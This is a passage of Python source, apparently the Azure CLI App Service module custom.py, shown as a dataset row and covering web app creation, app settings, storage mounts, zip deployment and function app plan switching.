source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import threading
import time
import ast
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from functools import reduce
from http import HTTPStatus
from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.mgmt.web.models import KeyInfo, DefaultErrorResponseException
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait, get_file_json
from azure.cli.core.util import get_az_user_agent, send_raw_request
from azure.cli.core.profiles import ResourceType, get_sdk
from azure.cli.core.azclierror import ResourceNotFoundError, RequiredArgumentMissingError, ValidationError
from .tunnel import TunnelServer
from .vsts_cd_provider import VstsContinuousDeliveryProvider
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES
from ._client_factory import web_client_factory, ex_handler_factory, providers_client_factory
from ._appservice_utils import _generic_site_operation
from .utils import _normalize_sku, get_sku_name, retryable_method
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
should_create_new_rg, set_location, get_site_availability, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src, get_current_stack_from_runtime)
from ._constants import (FUNCTIONS_STACKS_API_JSON_PATHS, FUNCTIONS_STACKS_API_KEYS,
FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX,
NODE_EXACT_VERSION_DEFAULT, RUNTIME_STACKS, FUNCTIONS_NO_V2_REGIONS)
# Module-level logger shared by all commands in this module.
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities"
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
                  deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
                  deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
                  multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
                  using_webapp_up=False, language=None, assign_identities=None,
                  role='Contributor', scope=None):
    """Create (or reuse) a web app on the given App Service plan.

    Resolves the plan (by name or ARM resource id), builds a SiteConfig
    according to the OS/runtime/container options, creates the site, then
    wires up source control, container settings and managed identities.

    :param using_webapp_up: set when invoked as a helper from `az webapp up`;
        turns on https_only and build-during-deployment app settings.
    :raises CLIError: on conflicting arguments, a missing plan, an invalid or
        mismatched existing app name, or an unsupported runtime.
    """
    SiteConfig, SkuDescription, Site, NameValuePair = cmd.get_models(
        'SiteConfig', 'SkuDescription', 'Site', 'NameValuePair')
    if deployment_source_url and deployment_local_git:
        raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
    docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
    client = web_client_factory(cmd.cli_ctx)
    # The plan can be given either as a full ARM resource id or as a plan
    # name inside the target resource group.
    if is_valid_resource_id(plan):
        parse_result = parse_resource_id(plan)
        plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
    else:
        plan_info = client.app_service_plans.get(resource_group_name, plan)
    if not plan_info:
        raise CLIError("The plan '{}' doesn't exist in the resource group '{}".format(plan, resource_group_name))
    is_linux = plan_info.reserved
    node_default_version = NODE_EXACT_VERSION_DEFAULT
    location = plan_info.location
    # This is to keep the existing appsettings for a newly created webapp on existing webapp name.
    name_validation = client.check_name_availability(name, 'Site')
    if not name_validation.name_available:
        if name_validation.reason == 'Invalid':
            raise CLIError(name_validation.message)
        # Name is taken: proceed only when it is the same app in the same
        # subscription / resource group, carrying over its app settings.
        logger.warning("Webapp '%s' already exists. The command will use the existing app's settings.", name)
        app_details = get_app_details(cmd, name)
        if app_details is None:
            raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that "
                           "the app is a part of the current subscription".format(name))
        current_rg = app_details.resource_group
        if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
            raise CLIError("The webapp '{}' exists in resource group '{}' and does not "
                           "match the value entered '{}'. Please re-run command with the "
                           "correct parameters.". format(name, current_rg, resource_group_name))
        existing_app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name,
                                                        name, 'list_application_settings')
        settings = []
        for k, v in existing_app_settings.properties.items():
            settings.append(NameValuePair(name=k, value=v))
        site_config = SiteConfig(app_settings=settings)
    else:
        site_config = SiteConfig(app_settings=[])
    # Always On is not offered on Free/Shared/Basic tiers, so only enable it
    # on higher SKUs.
    if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
                                                                                       'B1', 'B2', 'B3', 'BASIC']:
        site_config.always_on = True
    webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
                      https_only=using_webapp_up)
    helper = _StackRuntimeHelper(cmd, client, linux=is_linux)
    if runtime:
        runtime = helper.remove_delimiters(runtime)
    current_stack = None
    if is_linux:
        # Exactly one of runtime / container image / multicontainer config
        # may be chosen for a Linux app.
        if not validate_container_app_create_options(runtime, deployment_container_image_name,
                                                     multicontainer_config_type, multicontainer_config_file):
            raise CLIError("usage error: --runtime | --deployment-container-image-name |"
                           " --multicontainer-config-type TYPE --multicontainer-config-file FILE")
        if startup_file:
            site_config.app_command_line = startup_file
        if runtime:
            match = helper.resolve(runtime)
            if not match:
                raise CLIError("Linux Runtime '{}' is not supported."
                               " Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
            match['setter'](cmd=cmd, stack=match, site_config=site_config)
        elif deployment_container_image_name:
            site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
            if name_validation.name_available:
                site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
                                                              value="false"))
        elif multicontainer_config_type and multicontainer_config_file:
            encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
            site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
    elif plan_info.is_xenon:  # windows container webapp
        site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
        # set the needed app settings for container image validation
        if name_validation.name_available:
            site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_USERNAME",
                                                          value=docker_registry_server_user))
            site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_PASSWORD",
                                                          value=docker_registry_server_password))
            site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_URL",
                                                          value=docker_registry_server_url))
    elif runtime:  # windows webapp with runtime specified
        if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
            raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
                           "--multicontainer-config-type and --multicontainer-config-file is "
                           "only appliable on linux webapp")
        match = helper.resolve(runtime)
        if not match:
            raise CLIError("Windows runtime '{}' is not supported. "
                           "Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
        match['setter'](cmd=cmd, stack=match, site_config=site_config)
        # portal uses the current_stack propety in metadata to display stack for windows apps
        current_stack = get_current_stack_from_runtime(runtime)
    else:  # windows webapp without runtime specified
        if name_validation.name_available:  # If creating new webapp
            site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
                                                          value=node_default_version))
    if site_config.app_settings:
        for setting in site_config.app_settings:
            logger.info('Will set appsetting %s', setting)
    if using_webapp_up:  # when the routine is invoked as a help method for webapp up
        if name_validation.name_available:
            logger.info("will set appsetting for enabling build")
            site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
    if language is not None and language.lower() == 'dotnetcore':
        if name_validation.name_available:
            site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
                                                          value='https://{}.scm.azurewebsites.net/detectors'
                                                          .format(name)))
    poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def)
    webapp = LongRunningOperation(cmd.cli_ctx)(poller)
    if current_stack:
        _update_webapp_current_stack_property_if_needed(cmd, resource_group_name, name, current_stack)
    # Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
    _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
                             deployment_source_branch, deployment_local_git)
    _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
    if deployment_container_image_name:
        update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
                                  deployment_container_image_name, docker_registry_server_user,
                                  docker_registry_server_password=docker_registry_server_password)
    if assign_identities is not None:
        identity = assign_identity(cmd, resource_group_name, name, assign_identities,
                                   role, None, scope)
        webapp.identity = identity
    return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
                                          multicontainer_config_type=None, multicontainer_config_file=None):
    """Return True when exactly one valid container-app option combination is given.

    The multicontainer type and file must be supplied together; among runtime,
    container image and multicontainer config, exactly one may be chosen.
    """
    # Type and file are a pair: one without the other is invalid.
    if bool(multicontainer_config_type) != bool(multicontainer_config_file):
        return False
    chosen = sum(1 for option in (runtime, deployment_container_image_name, multicontainer_config_type) if option)
    return chosen == 1
def parse_docker_image_name(deployment_container_image_name):
    """Extract the registry server URL from a container image name.

    Returns None when no image is given or for Docker Hub images: a registry
    host must appear before the last '/' and contain a '.' (domain) or ':'
    (port); otherwise the prefix is just a Hub namespace.
    """
    if not deployment_container_image_name:
        return None
    registry, sep, _ = deployment_container_image_name.rpartition('/')
    if not sep or ('.' not in registry and ':' not in registry):
        return None
    return registry
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
    """Add or update app settings and/or slot-sticky app settings.

    Each entry is either 'KEY=VALUE' or a JSON blob (including the output of
    the 'list' command). Slot settings are also registered in the slot
    configuration names so they stay with the slot on swap.

    :raises CLIError: when neither --settings nor --slot-settings is given.
    """
    if not settings and not slot_settings:
        raise CLIError('Usage Error: --settings |--slot-settings')
    settings = settings or []
    slot_settings = slot_settings or []
    app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                           'list_application_settings', slot)
    result, slot_result = {}, {}
    # pylint: disable=too-many-nested-blocks
    for src, dest in [(settings, result), (slot_settings, slot_result)]:
        for s in src:
            try:
                temp = shell_safe_json_parse(s)
                if isinstance(temp, list): # a bit messy, but we'd like accept the output of the "list" command
                    for t in temp:
                        # NOTE: entries without an explicit 'slotSetting' key
                        # default to being treated as slot settings.
                        if t.get('slotSetting', True):
                            slot_result[t['name']] = t['value']
                        # Mark each setting as the slot setting
                        else:
                            result[t['name']] = t['value']
                else:
                    dest.update(temp)
            except CLIError:
                # Not JSON: fall back to plain KEY=VALUE parsing.
                setting_name, value = s.split('=', 1)
                dest[setting_name] = value
    # Slot settings win over plain settings when the same key appears in both.
    result.update(slot_result)
    for setting_name, value in result.items():
        app_settings.properties[setting_name] = value
    client = web_client_factory(cmd.cli_ctx)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_application_settings',
                                         app_settings.properties, slot, client)
    app_settings_slot_cfg_names = []
    if slot_result:
        # Register the new slot-sticky names on the production site config.
        new_slot_setting_names = slot_result.keys()
        slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
        slot_cfg_names.app_setting_names += new_slot_setting_names
        app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
                              share_name, access_key, mount_path=None, slot=None, slot_setting=False):
    """Attach a new Azure storage account mount to a web app (or slot).

    :raises CLIError: when an account with the same custom id already exists.
    """
    AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
    accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                       'list_azure_storage_accounts', slot)
    # 'add' is only valid for ids that are not configured yet.
    if custom_id in accounts.properties:
        raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
                       "Use 'az webapp config storage-account update' to update an existing "
                       "Azure storage account configuration.".format(custom_id))
    accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
                                                           share_name=share_name, access_key=access_key,
                                                           mount_path=mount_path)
    client = web_client_factory(cmd.cli_ctx)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_azure_storage_accounts', accounts.properties,
                                         slot, client)
    if slot_setting:
        # Mark the id as sticky to the slot so swaps do not move it.
        cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        sticky_ids = cfg_names.azure_storage_config_names or []
        if custom_id not in sticky_ids:
            sticky_ids.append(custom_id)
        cfg_names.azure_storage_config_names = sticky_ids
        client.web_apps.update_slot_configuration_names(resource_group_name, name, cfg_names)
    return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
                                 share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
    """Update an existing Azure storage account mount, keeping unspecified fields.

    :raises CLIError: when no account with the given custom id is configured.
    """
    AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
    accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                       'list_azure_storage_accounts', slot)
    previous = accounts.properties.pop(custom_id, None)
    if not previous:
        raise CLIError("No Azure storage account configuration found with the id '{}'. "
                       "Use 'az webapp config storage-account add' to add a new "
                       "Azure storage account configuration.".format(custom_id))
    # Any field not supplied falls back to its previous value.
    accounts.properties[custom_id] = AzureStorageInfoValue(
        type=storage_type or previous.type,
        account_name=account_name or previous.account_name,
        share_name=share_name or previous.share_name,
        access_key=access_key or previous.access_key,
        mount_path=mount_path or previous.mount_path)
    client = web_client_factory(cmd.cli_ctx)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_azure_storage_accounts', accounts.properties,
                                         slot, client)
    if slot_setting:
        # Mark the id as sticky to the slot so swaps do not move it.
        cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        sticky_ids = cfg_names.azure_storage_config_names or []
        if custom_id not in sticky_ids:
            sticky_ids.append(custom_id)
        cfg_names.azure_storage_config_names = sticky_ids
        client.web_apps.update_slot_configuration_names(resource_group_name, name, cfg_names)
    return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
    """Zip-deploy *src* to a function app.

    Chooses the deployment path: storage upload (run-from-package) for Linux
    Consumption without a remote build; otherwise the Kudu zipdeploy endpoint,
    after toggling the remote-build app settings accordingly.

    :raises CLIError: when the app does not exist, or remote build is
        requested for a non-Linux app.
    """
    client = web_client_factory(cmd.cli_ctx)
    app = client.web_apps.get(resource_group_name, name)
    if app is None:
        raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. '
                       'Please make sure these values are correct.'.format(name, resource_group_name))
    parse_plan_id = parse_resource_id(app.server_farm_id)
    plan_info = None
    retry_delay = 10 # seconds
    # We need to retry getting the plan because sometimes if the plan is created as part of function app,
    # it can take a couple of tries before it gets the plan
    for _ in range(5):
        plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
                                                 parse_plan_id['name'])
        if plan_info is not None:
            break
        time.sleep(retry_delay)
    # NOTE(review): plan_info can still be None here after all retries, in
    # which case is_plan_consumption receives None — confirm intended behavior.
    if build_remote and not app.reserved:
        raise CLIError('Remote build is only available on Linux function apps')
    is_consumption = is_plan_consumption(cmd, plan_info)
    # Linux Consumption without remote build: run from a package in storage.
    if (not build_remote) and is_consumption and app.reserved:
        return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
    if build_remote:
        add_remote_build_app_settings(cmd, resource_group_name, name, slot)
    else:
        remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
    return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
    """Zip-deploy the local file *src* to a web app; thin wrapper over enable_zip_deploy."""
    return enable_zip_deploy(cmd, resource_group_name, name, src,
                             timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
    """Push the local zip *src* to the Kudu (SCM) zipdeploy endpoint and poll until done.

    Uses basic-auth publishing credentials; the deployment is started
    asynchronously (isAsync=true) and then polled via the deployment status URL.

    :raises CLIError: when the SCM URL cannot be resolved or a deployment is
        already in progress (HTTP 409).
    """
    logger.warning("Getting scm site credentials for zip deployment")
    user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
    try:
        scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    except ValueError:
        raise CLIError('Failed to fetch scm url for function app')
    zip_url = scm_url + '/api/zipdeploy?isAsync=true'
    deployment_status_url = scm_url + '/api/deployments/latest'
    import urllib3
    authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
    # NOTE: 'headers' aliases the 'authorization' dict, so the extra headers
    # added below are also sent with the status polling request further down.
    headers = authorization
    headers['Content-Type'] = 'application/octet-stream'
    headers['Cache-Control'] = 'no-cache'
    headers['User-Agent'] = get_az_user_agent()
    import requests
    import os
    from azure.cli.core.util import should_disable_connection_verify
    # Read file content
    with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
        zip_content = fs.read()
        logger.warning("Starting zip deployment. This operation can take a while to complete ...")
        res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
        logger.warning("Deployment endpoint responded with status code %d", res.status_code)
    # check if there's an ongoing process
    if res.status_code == 409:
        raise CLIError("There may be an ongoing deployment or your app setting has WEBSITE_RUN_FROM_PACKAGE. "
                       "Please track your deployment in {} and ensure the WEBSITE_RUN_FROM_PACKAGE app setting "
                       "is removed.".format(deployment_status_url))
    # check the status of async deployment
    response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
                                            authorization, timeout)
    return response
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
    """Configure app settings required for a remote (server-side) build.

    Ensures SCM_DO_BUILD_DURING_DEPLOYMENT=true and removes
    WEBSITE_RUN_FROM_PACKAGE / ENABLE_ORYX_BUILD, then waits until the SCM
    site reflects the changes.
    """
    settings = get_app_settings(cmd, resource_group_name, name, slot)
    scm_do_build_during_deployment = None
    website_run_from_package = None
    enable_oryx_build = None
    app_settings_should_not_have = []
    app_settings_should_contain = {}
    # Snapshot the relevant settings (values are compared case-insensitively).
    for keyval in settings:
        value = keyval['value'].lower()
        if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
            scm_do_build_during_deployment = value in ('true', '1')
        if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
            website_run_from_package = value
        if keyval['name'] == 'ENABLE_ORYX_BUILD':
            enable_oryx_build = value
    if scm_do_build_during_deployment is not True:
        logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
        update_app_settings(cmd, resource_group_name, name, [
            "SCM_DO_BUILD_DURING_DEPLOYMENT=true"
        ], slot)
        app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'
    if website_run_from_package:
        logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
        delete_app_settings(cmd, resource_group_name, name, [
            "WEBSITE_RUN_FROM_PACKAGE"
        ], slot)
        app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')
    if enable_oryx_build:
        logger.warning("Removing ENABLE_ORYX_BUILD app setting")
        delete_app_settings(cmd, resource_group_name, name, [
            "ENABLE_ORYX_BUILD"
        ], slot)
        app_settings_should_not_have.append('ENABLE_ORYX_BUILD')
    # Wait for scm site to get the latest app settings.
    # Fix: break out of the retry loop as soon as validation succeeds, instead
    # of unconditionally sleeping 5 seconds after a successful check.
    if app_settings_should_not_have or app_settings_should_contain:
        logger.warning("Waiting SCM site to be updated with the latest app settings")
        retries = 10
        while retries >= 0:
            scm_is_up_to_date = validate_app_settings_in_scm(
                cmd, resource_group_name, name, slot,
                should_contain=app_settings_should_contain,
                should_not_have=app_settings_should_not_have)
            if scm_is_up_to_date:
                break
            retries -= 1
            time.sleep(5)
        if retries < 0:
            logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
    """Disable remote build by forcing SCM_DO_BUILD_DURING_DEPLOYMENT=false.

    After updating the setting, waits until the SCM site reflects the change.
    """
    settings = get_app_settings(cmd, resource_group_name, name, slot)
    scm_do_build_during_deployment = None
    app_settings_should_contain = {}
    for keyval in settings:
        value = keyval['value'].lower()
        if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
            scm_do_build_during_deployment = value in ('true', '1')
    if scm_do_build_during_deployment is not False:
        logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
        update_app_settings(cmd, resource_group_name, name, [
            "SCM_DO_BUILD_DURING_DEPLOYMENT=false"
        ], slot)
        app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'
    # Wait for scm site to get the latest app settings.
    # Fix: break out of the retry loop as soon as validation succeeds, instead
    # of unconditionally sleeping 5 seconds after a successful check.
    if app_settings_should_contain:
        logger.warning("Waiting SCM site to be updated with the latest app settings")
        retries = 10
        while retries >= 0:
            scm_is_up_to_date = validate_app_settings_in_scm(
                cmd, resource_group_name, name, slot,
                should_contain=app_settings_should_contain)
            if scm_is_up_to_date:
                break
            retries -= 1
            time.sleep(5)
        if retries < 0:
            logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
    """Upload *src* to the app's storage account and run the package from there.

    Used for Linux Consumption function apps: the zip goes into a
    'function-releases' blob container, a long-lived read-only SAS is
    generated, WEBSITE_RUN_FROM_PACKAGE is pointed at the blob, and function
    triggers are synced.

    :raises CLIError: when the AzureWebJobsStorage app setting is missing.
    """
    settings = get_app_settings(cmd, resource_group_name, name, slot)
    storage_connection = None
    for keyval in settings:
        if keyval['name'] == 'AzureWebJobsStorage':
            storage_connection = str(keyval['value'])
    if storage_connection is None:
        raise CLIError('Could not find a \'AzureWebJobsStorage\' application setting')
    container_name = "function-releases"
    blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
    BlockBlobService = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService')
    block_blob_service = BlockBlobService(connection_string=storage_connection)
    if not block_blob_service.exists(container_name):
        block_blob_service.create_container(container_name)

    # https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
    def progress_callback(current, total):
        # Render a 30-character progress bar in the CLI progress controller.
        total_length = 30
        if not total:  # guard against a zero-byte upload (avoids ZeroDivisionError)
            return
        # Fix: round the whole ratio. The previous code computed
        # int(round(total_length * current) / float(total)), which rounded only
        # the numerator and then truncated the division.
        filled_length = int(round(total_length * current / float(total)))
        percents = round(100.0 * current / float(total), 1)
        progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
        progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
        cmd.cli_ctx.get_progress_controller().add(message=progress_message)

    block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
                                             progress_callback=progress_callback)
    # SAS window: 10 minutes in the past (clock skew) to ~10 years out.
    now = datetime.datetime.now()
    blob_start = now - datetime.timedelta(minutes=10)
    blob_end = now + datetime.timedelta(weeks=520)
    BlobPermissions = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions')
    blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
                                                                          blob_name,
                                                                          permission=BlobPermissions(read=True),
                                                                          expiry=blob_end,
                                                                          start=blob_start)
    blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
    website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
    update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
    client = web_client_factory(cmd.cli_ctx)
    try:
        logger.info('\nSyncing Triggers...')
        if slot is not None:
            client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
        else:
            client.web_apps.sync_function_triggers(resource_group_name, name)
    except CloudError as ex:
        # This SDK function throws an error if Status Code is 200
        if ex.status_code != 200:
            raise ex
    except DefaultErrorResponseException as ex:
        if ex.response.status_code != 200:
            raise ex
def _generic_settings_operation(cli_ctx, resource_group_name, name, operation_name,
                                setting_properties, slot=None, client=None):
    """Invoke a web_apps settings operation, dispatching to the '_slot' variant when a slot is given.

    :param operation_name: name of the method on client.web_apps, e.g.
        'update_application_settings'.
    :param client: optional pre-built web client; created on demand otherwise.
    """
    client = client or web_client_factory(cli_ctx)
    operation = getattr(client.web_apps, operation_name if slot is None else operation_name + '_slot')
    if slot is None:
        # NOTE(review): the builtin `str` is passed positionally here (and
        # below), apparently filling the SDK's `kind` parameter slot — confirm
        # against the WebApps SDK operation signatures.
        return operation(resource_group_name, name, str, setting_properties)
    return operation(resource_group_name, name, slot, str, setting_properties)
def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None):
    """Return the site object, with server-farm props renamed and the FTP URL filled in.

    When invoked as a helper, *app_instance* can supply an already-fetched site.
    :raises CLIError: when the app cannot be found.
    """
    webapp = app_instance or _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    if not webapp:
        raise CLIError("'{}' app doesn't exist".format(name))
    _rename_server_farm_props(webapp)
    _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot)
    return webapp
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
    """Fetch a web app (optionally a deployment slot) via the generic site operation."""
    site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    return site
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,
               skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs):
    """Create-or-update a web app from a full site envelope (generic updater hook).

    The envelope is passed by the generic update machinery in kwargs['parameters'].
    """
    instance = kwargs['parameters']
    client = web_client_factory(cmd.cli_ctx)
    call_args = {
        'resource_group_name': resource_group_name,
        'name': name,
        'site_envelope': instance,
        'skip_dns_registration': skip_dns_registration,
        'skip_custom_domain_verification': skip_custom_domain_verification,
        'force_dns_registration': force_dns_registration,
        'ttl_in_seconds': ttl_in_seconds,
    }
    if slot:
        call_args['slot'] = slot
        return client.web_apps.create_or_update_slot(**call_args)
    return client.web_apps.create_or_update(**call_args)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
    """Apply simple boolean toggles to an existing web app site object.

    CLI-layer booleans arrive as the strings 'true'/'false'; None leaves the
    corresponding attribute untouched.
    :raises CLIError: for function apps (use 'az functionapp update' instead).
    """
    if 'function' in instance.kind:
        raise CLIError("please use 'az functionapp update' to update this function app")
    for attr, flag in (('client_affinity_enabled', client_affinity_enabled),
                       ('https_only', https_only)):
        if flag is not None:
            setattr(instance, attr, flag == 'true')
    return instance
def update_functionapp(cmd, instance, plan=None, force=False):
    """Move a function app to another plan when *plan* is given; return the updated instance.

    :raises ResourceNotFoundError: when the destination plan does not exist.
    """
    client = web_client_factory(cmd.cli_ctx)
    if plan is None:
        return instance
    # The destination plan can be a full ARM id or a name in the app's group.
    if is_valid_resource_id(plan):
        parts = parse_resource_id(plan)
        dest_plan_info = client.app_service_plans.get(parts['resource_group'], parts['name'])
    else:
        dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
    if dest_plan_info is None:
        raise ResourceNotFoundError("The plan '{}' doesn't exist".format(plan))
    validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info, force)
    instance.server_farm_id = dest_plan_info.id
    return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance, force):
    """Validate that a function app may move from its current plan to the destination plan.

    Only Windows Consumption <-> Elastic Premium switches are allowed;
    Premium -> Consumption additionally requires --force.

    :raises ResourceNotFoundError: when the source plan cannot be resolved.
    :raises ValidationError: for unsupported plan combinations.
    :raises RequiredArgumentMissingError: Premium -> Consumption without --force.
    """
    general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.'
    src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
    src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
                                                 src_parse_result['name'])
    if src_plan_info is None:
        raise ResourceNotFoundError('Could not determine the current plan of the functionapp')
    # Ensure all plans involved are windows. Reserved = true indicates Linux.
    if src_plan_info.reserved or dest_plan_instance.reserved:
        raise ValidationError('This feature currently supports windows to windows plan migrations. For other '
                              'migrations, please redeploy.')
    src_is_premium = is_plan_elastic_premium(cmd, src_plan_info)
